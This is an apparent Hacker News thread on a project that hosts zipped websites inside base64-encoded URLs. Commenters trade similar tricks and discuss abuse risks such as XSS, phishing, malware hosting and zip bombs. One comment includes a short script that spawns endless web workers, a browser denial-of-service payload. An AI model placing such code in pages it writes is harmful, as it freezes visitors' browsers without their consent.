Settings

Theme

Show HN: Host a Website in the URL

smolsite.zip

602 points by acidx 2 years ago · 195 comments · 1 min read

Reader

I wrote this silly thing a couple of weeks ago. It's absolutely useless but it's a fun tech demo for my web server library. Enjoy!

Lerc 2 years ago

Neat

https://smolsite.zip/UEsDBBQAAgAIAFtLJ1daaE7RlwIAAN4EAAAKAAA...

dmazzoni 2 years ago

Just in case anyone doesn't already know, you can do that with a data uri as well:

data:text/html,<h1>My%20small%20website</h1><p>Look,%20it's%20real!</p>

You can use a data uri generator to base64-encode it, if you want.

Advantages of smolsite:

- Zip might let you fit a bit more than a data uri

- Some JS APIs would work on a smolsite url, but wouldn't work in a data uri

geonnave 2 years ago

On the subject of weird stuff on a URL, here is a prime dog: https://geonnave.github.io/primg/#17976931348623159077293051...

wgx 2 years ago

My response in a URL:

https://wgx.github.io/anypage/?eyJoMSI6IkhlbGxvIEhOISIsImgyI...

SushiHippie 2 years ago

Nice, reminds me of nopaste [0], which is a pastebin that stores the text in the url compressed with lzma and encoded with base64.

[0] https://nopaste.boris.sh/

dspillett 2 years ago

That will send the content to the server for unpacking. A slightly more convoluted option might be to put the zip in the anchor part instead and have the response serve code to unpack it from there client side. Though now the server can't scan for damaging content being sent via it, even if it wanted to, as the anchor part does not get sent to the server.

  • cnity 2 years ago

    I thought the same thing (though you could do it without anchors as long as the static content server used a glob for routing all traffic to the same web page). It would really simplify hosting.

debarshri 2 years ago

this is really cool and I think it feel like how show HN should be instead of marketing ploy for other orgs pushing their product.

  • hsbauauvhabzb 2 years ago

    I love this type of stuff too, but be aware ycombinator is a start up incubator - people showing off there wares is presumably encouraged, up to a point.

  • matheusmoreira 2 years ago

    I don't think it qualifies as advertising. People come to Hacker News to see what hackers are working on. It's certainly a major reason why I come here.

    Every Show HN post I've seen was interesting. Motivated me to start my own projects and polish them so I can show them here. It's a really good feeling when someone else submits your work and you get to talk about it.

  • mathgeek 2 years ago

    Do you get the impression that novel shows are pushed out by the more corporate ones?

  • fouc 2 years ago

    yeah and that's why interesting show HNs get upvoted

GMoromisato 2 years ago

I had an idea once to implement Borges's Library of Babel just like this: all the text is in the URL. With more sophisticated encoding, you can optimize English words. Then hook it up to a "search system" so you can search for your own name, clips of text, etc.

Eventually you'd hit the URL size limit, of course, but maybe we add a layer on top for curators to bundle sets of URLs together to produce larger texts. Maybe add some LLM magic to generate the bundles.

You'd end up with a library that has, not just every book ever written, but every book that could ever be written.

[Just kidding, of course: I know this is like saying that Notepad already has every book in existence--you just have to type them in.]

alpb 2 years ago

Previously posted similar work

https://news.ycombinator.com/item?id=34312546

https://news.ycombinator.com/item?id=2464213

  • joe5150 2 years ago

    The comment in the first link about Yahoo embedding a giant b64-encoded JSON object in the URL reminds me of something horrible I did in a previous job.

    To get around paying our website vendor (think locked-down hosted CMS) for an overpriced event calendar module, I coded a public page that would build a calendar using a base64-encoded basic JSON "events" schema embedded in a "data-events" attribute. Staff would use a non-public page that would pull the existing events data from the public page to prepopulate the calendar builder, which they could then use to edit the calendar and spit out a new code snippet to put on the public page. And so on.

    It basically worked! But I think they eventually did just fork over the money for the calendar add-on.

    • tomcam 2 years ago

      Wait what was horrible about it?

      • joe5150 2 years ago

        Mostly just the DIV with a giant string of base64-encoded JSON in a data attribute that looked pretty ugly. Website visitors were of course basically none the wiser if it all worked.

  • rpastuszak 2 years ago

    Can't find the HN link now, but here's the "Twitter CDN" project I posted a few years back (base64+gzip data URIs):

    https://sonnet.io/projects#:~:text=Laconic!%20(a%20Twitter%2...

ihaveajob 2 years ago

This is hilarious, but I think it may have some practical applications. Watch out for hackers though.

  • grepfru_it 2 years ago

    I immediately thought this is a great way to ship malicious payloads to an unexpected party. A good WAF would block it as sus, but a few tricks could probably get around that as well

    • anamexis 2 years ago

      How is it different from any webpage in that regard?

      • misterbwong 2 years ago

        The difference is that the contents of this website can be crafted by the attacker directly via the URL without having to do anything to the host.

        • anamexis 2 years ago

          How is that a meaningful attack vector, unique from webpages in general?

          • ddtaylor 2 years ago

            In this exact context it's likely not a problem, but essentially this is a ready to go XSS attack. As far as I can tell there is no CORS or domain level protections, so an "attacker" here could easily do anything else with any client-side data being used by any other "site" on the domain.

            Let's say I make a little chat app that stores some history or some other data in local browser storage or cookies. Any other site can just as easily access all of that information. An "attacker" could link you to a modified version of the chat site that relays all of your messages to their server while still making it otherwise look like it's just the normal chat. It would also retain any client side information you had previously entered like your nick name or chat history, since it's stored in local storage.

            Most of the time sanitizing input, like ensuring users don't have HTML in their names or comments, combined with domain-level separation and CORS policies ensures that one site can't do things that "leak" into another. It's the reason most of the time no matter how bad people mess things up Facebook getting hacked in your browser doesn't compromise your Google account.

            • rainonmoon 2 years ago

              Intrepid web developers reading this comment, please note that CORS is not, in fact, a protection mechanism. It's a way to relax the Same Origin Policy which is actually the protection relevant here. You don't need a CORS policy to protect a site from cross-site attacks, you need no CORS policy. Go ahead and make your little chat app, you're not at risk of having your messages stolen because of a lack of CORS headers.

              • todd3834 2 years ago

                Perhaps they meant CSP

                • ddtaylor 2 years ago

                  I did say it wrong, but my point was that the site doesn't segment off each "site" into a different subdomain or any other ruleset that would allow the same origin policy to restrict access.

                  As it is with this site, the messages can get "stolen" by any other site on the same domain, which can be anything since anyone can upload one and direct a victim to them.

            • rmbyrro 2 years ago

              But then the attacker URL will be different.

              That doesn't look like a new attack vector, this is called phishing, isn't it?

              XSS means you can inject and persist code in a webpage maintaining the same URL accessed by other users.

              If you create a bigbank-fake.com and copy a manipulated version of bigbank.com's HTML, this is not XSS.

          • Syntaf 2 years ago

            1. Find existing smol being shared around

            2. Modify the parameters to hijack any relevant content

            3. Reshare the smol site with your changes under the guise it’s the original link

            • anamexis 2 years ago

              That’s not novel. You could say the same thing for a GitHub Pages page, or a Code Sandbox, or an S3 static site, or really anything.

              The only reason that would be a threat is if you implicitly trusted smolsite.zip, which would be an odd thing to do.

              • pcthrowaway 2 years ago

                Github pages uses a unique domain per page to prevent sites from loading each others' cookies, localstorage, service workers, etc.

              • ncruces 2 years ago

                The difference is that if GitHub is found distributing malware on GitHub pages, you can notify them, they verify it, take it down, and open a process to eventually ban the offender.

                They expend enough effort in this as to ensure the vast majority of content on GitHub pages is not malware, and avoid getting blankedly flagged as such.

                It's not clear if smolsite.zip can successfully set up a similar process, given that they'll serve just any zip that's in the URL, and they won't have the manpower to verify takedown requests.

                • anamexis 2 years ago

                  If your security model relies on arbitrary hosts on the internet proactively taking down malicious URLs, you're in for a bad time.

                  • ncruces 2 years ago

                    My security model is not going to do smolsite.zip any good when quad9, 1.1.1.2, et al. decide to outright block the domain.

                    Also, cookies.

            • rmbyrro 2 years ago

              That's a known attack vector called phishing, no? Any website can be phished, not just smolsites

mazokum 2 years ago

Reminded me of a site from the creator of Advent of Code to share solutions of the puzzles (or any plaintext for that matter).

https://github.com/topaz/paste

senseiV 2 years ago

Nice!

I remember seeing this for the first time on HN with urlpages, inspired me to build my own version of these

https://js-labs.js.org/

grimgrin 2 years ago

excellent!

and my website _is_ already in a zip hehe https://redbean.dev

Ndymium 2 years ago

Cool little project! I did a similar thing recently, I wrote a pastebin that puts the file contents in the URL with brotli. [0]

It works quite well, but I'll need to update the syntax highlighting soon as at least Gleam is out of date (boy that language moves fast), and sometimes brotli-wasm throws a memory allocation error for some reason. I guess that's one cool thing that WASM brought to the table, memory handling issues.

[0] https://nicd.gitlab.io/t/

high_byte 2 years ago

you could save yourself from serving all the websites (and server costs) with just one character! pass the base64 in the hash field by simply prepending # to it. also it seems the URL length limits do not include the hash, so maybe notsosmolsite.zip? ;)

netcraft 2 years ago

This reminds me of this project: http://ephemeralp2p.durazo.us/2bbbf21959178ef2f935e90fc60e5b...

Myself and two other people have literally kept this page alive for many years - the github repo says 2017.

  • dang 2 years ago

    https://news.ycombinator.com/item?id=37410630 is fun but it's too much of a follow-up* to the current thread. If you get in touch with us at hn@ycombinator.com after some time (say a month or two, to flush the hivemind caches), we'll send you a repost invite.

    * https://hn.algolia.com/?dateRange=all&page=0&prefix=true&que...

    • netcraft 2 years ago

      Ok, cool. I'm not sure I understand the issue though, this thread reminded me of that page, so I thought other people might be interested in it too, and there wasn't much conversation here and felt like this was somewhat offtopic on this page anyway.

  • hattmall 2 years ago

    It's neat but it's like P2P but doubling the bandwidth.

  • acidxOP 2 years ago

    Oh, this is a cool experiment!

    • netcraft 2 years ago

      Its been very interesting over the years. Myself and these other folks have this connection, but no way to communicate or even know who they are.

      • sweetjuly 2 years ago

        It doesn't seem like the client actually verifies that the content it got back matches the SHA256 it requested, so in theory if you really wanted to meet them you could start sending an update website with details to get in contact with you. Though, that'd ruin the magic of it I'd bet :)

low_tech_punk 2 years ago

Take it to the next level, maybe switch from server side zip to browser native gzip?

1. You could achieve this on a static server, like GitHub pages

2. You could make the page editable and auto generate new URLs as the page gets edited.

See:

https://developer.mozilla.org/en-US/docs/Web/API/Compression...

vanderZwan 2 years ago

I did something like this last year (maybe two years ago by now? time flies), but with LZString instead of gzip[0]. The original idea was actually someone else's on Mastodon (who knows, maybe it was OP? I think it was Ramsey Nassr though), but it was just B64 at first - I added the compression.

Then someone tried fitting King Lear in there (which worked).

Then it turned out that until that day but not for very long after that URLs were not counted for character limits in mastodon toots.

That froze quite a few Mastodon clients who were unlucky enough to open that toot for a day or two until that got fixed. Not sure why, I'm guessing (accidentally) quadratic algorithms that weren't counting on urls that were multiple kilobytes in length.

[0] https://blindedcyclops.neocities.org/onlinething/writer

Theodores 2 years ago

Imaginably this can be done with Brotli too.

I like embedding external resources such as bitmap images in SVG in CSS in HTML so that a document is truly portable and can be sent by email or messenger services. So I don't need a URL. The whole document has to be shared, not just a link to it.

I also found the favicon can be encoded in this way.

I don't do scripts, but a lot of fun can be had with HTML when you start doing unusual things with it. For CSS I also use my own units, just for fun. So no pixels, ems or points, but something else... CSS variables make this possible. I like to use full semantic elements and have minimal classes, styling the elements. This should confuse the front end developer more used to the 'painting by numbers' approach of typical website frontend work.

  • Y_Y 2 years ago

    Sounds cool, can you link an example?

    • Theodores 2 years ago

      Soon...

      I just work from the HTML specs and go my own way. There is something I am working on that 'needs' this stuff. I see HTML as a creative medium and I wanted to solve problems such as internal document navigation - rather than hundreds of web pages, compile the lot into one.

      The PWA takes an entirely different approach to what I am trying to do. I like the PWA approach but I want one file that can be moved or emailed, to be available offline.

      I found that making all the images inline worked for me. I got best results with webp rather than avif but don't care about losing the size benefits with base64 encoding - once zipped those compress nicely.

MattyRad 2 years ago

Very cool! I have a similar project that uses DNS instead of a path parameter https://serv.from.zone but smolsite is much simpler.

stolenmerch 2 years ago

See also: https://itty.bitty.site/

quickthrower2 2 years ago

I like how it requires sending all the data up to the server, where I guess it gets discarded, returns a static HTML page that converts that same data on the client into a web page.

Has the advantages of being centralized (site can be shut down, nuking all URLS) and decentralized (requires tech skills to set up, site cannot be updated without changing URL, etc.). Adding tinyurl to this as suggested in another comment takes it to the next level!

Helmut10001 2 years ago

I wonder what happens about the liability for content on these URL-websites. Is the liability now on the one who shares the URL, or on those who serves it?

resonious 2 years ago

I see this a lot. Some unsolicited advice: you don't need cat for this kind of command:

    echo "https://smolsite.zip/`cat somesite.zip | base64 --wrap 0`"
can become

    echo "https://smolsite.zip/`base64 --wrap 0 < somesite.zip`"
- Really awesome project nonetheless!
ngc6677 2 years ago

Also having fun on this subject https://goog.space/, trying to add webRTC and yjs, also archive.is for storing a link (and minification). Fun to see so many people are trying things out with URLs, client side web apps, encoding/decoding data

rambambram 2 years ago

You didn't only wrote this "silly thing", you also host it on your self-built server? Wow!

wmab 2 years ago

Some images are base64 in URLs in Google image search results for their thumbnails. Does anyone have any idea why?

Search "Pepsi can" and some when you right click > copy image address will result in ".../" instead of the website's image. Presumably to limit server cost / make the browser render? It's not for all sites, so perhaps more common sites (Walmart for example) it gives the correct image URL.

Pepsi can image from:

[1] https://crescentmarket.shop/ ...//9k=

[2] But when you click through: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQwXbLG...

[3] Paperpunchplus.com shows the correct image URL https://www.paperpunchplus.com/https://cdn3.evostore.io/prod...

  • jstarfish 2 years ago

    Specifically for a gallery page of search results, I'd guess that it's to provide a more-consistent experience.

    When you load that results page, you'd be reaching out to ~100+ different domains that will respond and render the images at different rates (and some will fail to load at all). Base64-encoding lets you shove binary content into caches like Redis, retrieval and embedding of which would be preferable to hotlinking to a slow site. Then most of the page gets rendered at the same time client-side.

Tade0 2 years ago

I still have control over the domain I bought a few years ago to implement something similar.

What ultimately stopped me is that on a site of this type you can't really include links to other sites made the same way, because your URL length is going to balloon.

chrisvxd 2 years ago

Absolutely useless fun tech demos are the best kind of demos

https://github.com/lpereira/lwan - presume this is the web server library you're referring to? Very cool.

  • acidxOP 2 years ago

    Yes, that's the library! It's something I've been slow cooking for over 10 years at this point. :)

koito17 2 years ago

Coolest application of those data URL ever. It's amazing how simple this idea is yet I have NEVER considered trying it out. I am not surprised this idea has already been done before, but it's still somehow never crossed my imagination.

HeavyStorm 2 years ago

I can't do it right now, but think of this: we can then create a site that, upon some input, creates a zip file and links to itself, in a possible infinite loop of self generating web sites!

SoulMan 2 years ago

I sometimes use this https://github.com/topaz/paste

adrianomartins 2 years ago

Amazing! The internet never ceases to surprise.

v_ignatyev 2 years ago

Let's see how people in future will trick Neuralink to host websites in others' heads.

klntsky 2 years ago

Would it be possible to fit webtorrent in?

giuliomagnifico 2 years ago

This is very cool, thanks for sharing!

meiraleal 2 years ago

It is not useless, it is very cool. But the website is hosted at HN server, not in the URL.

lagniappe 2 years ago

how does it react to a zip bomb?

  • pmarreck 2 years ago

    "Compression bombs that use the zip format must cope with the fact that DEFLATE, the compression algorithm most commonly supported by zip parsers, cannot achieve a compression ratio greater than 1032. For this reason, zip bombs typically rely on recursive decompression, nesting zip files within zip files to get an extra factor of 1032 with each layer. But the trick only works on implementations that unzip recursively, and most do not."

    https://www.bamsoftware.com/hacks/zipbomb/

  • whoomp12342 2 years ago

    2000 bytes limit

    • pcthrowaway 2 years ago

      Which is enough to store any content (unzipped it just needs to contain a link to the next chunk)

    • DriverDaily 2 years ago

      Plenty of room for a recursive function with no base case

      • grepfru_it 2 years ago

        You're not getting very far on 2k bytes. A 10k file expands to 10MB and will likely timeout if the author's webhost configured proper limits

        • acidxOP 2 years ago

          Files are not decompressed in the server: it sends the unmodified deflate stream back to the user.

        • DriverDaily 2 years ago

          Wouldn't infinitely spawning web workers do the same thing as a zip bomb?

          ```

          <script>

             const workerBlob = new Blob(['
          
                  while (true) { console.log("this is a worker that will never stop") }
          
              '], { type: 'application/javascript' })
          
             const workerBlobURL = URL.createObjectURL(workerBlob)
          
             while (true) { new Worker(workerBlobURL) }
          
          </script>

          ```

xxdesmus 2 years ago

I look forward to the phishinhg. Hopefully you can block known bad hashes.

masukomi 2 years ago

cool. alas, i've got all .zip domains blocked because the vast majority of them are used by malware people trying to trick someone into "downloading a zip file"

(this was so predictable)

expertentipp 2 years ago

How do I get a salaried job doing cool hackery stuff like this?

  • matheusmoreira 2 years ago

    Let us know if you find out the answer. Closest I can think of is to try to be so impossibly awesome that you get sponsors at GitHub.

danpalmer 2 years ago

This is a fun hack, nice one.

Thinking of reasons to not do this though, it's effectively impossible to content moderate, at least not without building a database of all the content you don't want to host.

  • johnnyworker 2 years ago

    Make it purely client side JS and use URL fragments -> host (and receive) nothing.

    • danpalmer 2 years ago

      That's even worse. The issue is not that you have the bytes, it's that users see the content on your site. The less control you have the more difficult it would be to meet legal obligations surrounding user generated content.

      The deal made years ago in law in the US (and followed around the world) is that websites are not liable for the user generated content that they make available, as long as they remove it if requested for legitimate reasons. These two components go hand in hand. If a website is unable to remove content, it's effectively liable for that content. This basically breaks the web as we know it today.

klntsky 2 years ago

Base64 is far from being efficient for this use case

  • pmarreck 2 years ago

    Base122 or whatever the other option is (and I'm sure there are others), which tries to take advantage of the whole UTF-8 space, and probably wouldn't even work on URLs, is only something like 15% denser. Obviously, you're limited to printable characters, here.

lwansbrough 2 years ago

Like pastebin, but instead of text it’s a 0-day!

nvr219 2 years ago

geez allowing the .zip tld was such a bad idea

markburns 2 years ago

Needs to support DMCA takedown notices

4RealFreedom 2 years ago

This is so much fun! Great idea!

mixeden 2 years ago

This is genious

HeavyStorm 2 years ago

Very cool concept!!

Modified3019 2 years ago

But can it fit DOOM?

ShakirWorks 2 years ago

God bless internet

adibalcan 2 years ago

Really cool

m00dy 2 years ago

would be useful with url shortener.

  • thih9 2 years ago

    You can use an external one.

    In which case it would be also your hosting provider.

py4 2 years ago

Pretty cool!

MoElmredi 2 years ago

isn't there a size limit?

matt3210 2 years ago

So smol!!

rpastuszak 2 years ago

Nice! I did something similar a few years back too!

I called it the Twitter CDN™ [1]

Here's Pong and The Epic of Gilgamesh, in a Tweet: https://twitter.com/rafalpast/status/1316836397903474688

Here's the editor: https://laconic.sonnet.io/editor.html

And here's the article explaining how it works: https://laconic-mu.vercel.app/index.html?c=eJylWOuS27YV%2Fu%...

[1] all thanks to the fact that Twitter applies a different char limit to URLs. We wouldn't want to lose those delicious tracking params, would we?

porsager 2 years ago

Yeah, I had exactly that, but in my opinion better, with fullscreen mode on https://flems.io. Right up until hackers found it was a great place to host their phishing sites...

  • mattbgates 2 years ago

    I created a website years ago that let anyone come and just "post" something online anonymously, quick notes or whatever, but have since had to add a registration process and record ip addresses, as the website was overrun by what looked like russian hackers and the dark web in general looking for a place for uh... post links to child... well anyways, took me almost a month to track down all my own website links, as everything was encrypted and growing faster than i could delete it. def sucks to know that even though i took down the means for a place for them to 'conduct business', they will continue to find other websites.

  • acidxOP 2 years ago

    That's why we can't have nice things. :(

  • fouc 2 years ago

    Oh so you basically prevent fullscreen mode? Not bad! The average user of flems probably doesn't need fullscreen after all.

rtcode_io 2 years ago

We host the full https://RTCode.io playground state in the hash, deploy it to https://RTEdge.net and serve the output at / and the playground at /?

- <https://RTEdge.net/> output

- <https://RTEdge.net/?> playground

For more information: https://efn.kr

  • pmarreck 2 years ago

    wow, this is some interesting web voodoo! What about auth?

    • rtcode_io 2 years ago

      Auth is handled in the playground. We offer "Sign in with GitHub, Google, Microsoft, Facebook, and Apple". Anyone can see the code with /? but only the owner(s) can (re-)deploy it.

      ---

      There is also service worker support which deploys as a Cloudflare Worker!

      See <https://sw.rt.ht/?> -> https://sw.rt.ht

madacol 2 years ago

If the author decides to use the URL hash instead, he can avoid users sending that zip to his server

i.e.

   https://smolsite.zip/#UEsDBB...
  • mholt 2 years ago

    I'm guessing the code to read the zip file is server-side, but I guess JS could do it too.

    • madacol 2 years ago

      Yeah, server-side is much easier to code. But it should be doable with JS

      I've already built a website that read zip files client-side with JS here: https://madacol.github.io/ozempic-dicom-viewer/ . It will read the zip file and search for MRI/CT scan images to display

      Where I have doubts is how to reference external files from the main `index.html` file. I know you can load files as blobs and get a URL (I did that in my website above), but I am not sure if that will work as references in the <head>

  • acidxOP 2 years ago

    Then it would require JavaScript and wouldn't be a nice demonstration for my web server library. :)

    • madacol 2 years ago

      You told in another comment that the files are not decompressed on the server. Then if you don't require JS, where is the decompression happening?

      • acidxOP 2 years ago

        On the client.

        Data is already stored in the ZIP file deflated, so I can just send whatever is inside the ZIP file back to the client if they accept that encoding (which is pretty much always the case, given how ubiquitous deflate is).

        The server parses the ZIP file and stores that information in a hash table for quicker lookup but it's otherwise not decompressing anything. This hash table is kept for a few minutes to avoid having to decode the base64-encoded data and parse the ZIP file for every request.

        • madacol 2 years ago

          That's nice!

          So decompression is happening on the client, but not at the JS level, instead you are taking advantage of browser's ability to accept zip-encoded content from the server, hence decompression is done the by browser's own behavior when it receives a "content-encoding: gzip" stream or something like that.

  • globalise83 2 years ago

    Use hash and avoid unnecessary work - good advice dude!

gildas 2 years ago

Alternatively, when formatted "properly", you can also simply host your zip file. See https://gildas-lormeau.github.io/ for example.

rswskg 2 years ago

Literally designed around XSS

Keyboard Shortcuts

j
Next item
k
Previous item
o / Enter
Open selected item
?
Show this help
Esc
Close modal / clear selection